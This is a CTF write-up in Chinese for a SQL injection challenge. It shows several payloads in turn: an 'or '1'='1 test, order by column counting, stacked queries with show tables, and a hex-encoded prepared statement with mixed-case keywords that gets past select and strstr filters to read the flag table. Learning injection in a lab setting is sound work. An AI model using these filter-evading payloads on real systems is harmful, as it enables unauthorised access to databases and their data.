题目直接写明随便注,那么就先上'or '1'='1试试:

    1. array(2) {
    2.   [0]=>
    3.   string(1) "1"
    4.   [1]=>
    5.   string(7) "hahahah"
    6. }
    8. array(2) {
    9.   [0]=>
    10.   string(1) "2"
    11.   [1]=>
    12.   string(12) "miaomiaomiao"
    13. }
    15. array(2) {
    16.   [0]=>
    17.   string(6) "114514"
    18.   [1]=>
    19.   string(2) "ys"
    20. }

    接着跑列数order by

    1. ?inject=1' order by 2--+

    跑出来后,尝试select,结果提示过滤
    image.png
    不会sql注入,sqlmap跑一遍也没效果,最后看了wp才知道还有堆叠注入。
    payload:?inject=1';show tables;

    1. array(1) {
    2.   [0]=>
    3.   string(16) "1919810931114514"
    4. }
    6. array(1) {
    7.   [0]=>
    8.   string(5) "words"
    9. }

    而绕过select过滤,需要使用sql预编译。
    payload:

    1. ?inject=1';set @a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;prepare stmt from @a;execute stmt;

    其中0x73656c656374202a2066726f6d20603139313938313039333131313435313460select * from1919810931114514`的16进制,之所以表名用````包裹是因为表名是纯数字。<br />但是又提示![image.png](https://cdn.nlark.com/yuque/0/2021/png/2658344/1620828566364-691300b1-966a-4e7a-a11d-7170ccf5ad10.png#align=left&display=inline&height=55&margin=%5Bobject%20Object%5D&name=image.png&originHeight=110&originWidth=514&size=4605&status=done&style=none&width=257)<br />php的strstr`函数可以用大小写绕过
    最后payload:

    1. ?inject=1';Set @a=0x73656c656374202a2066726f6d20603139313938313039333131313435313460;Prepare stmt from @a;Execute stmt;

    得到flag。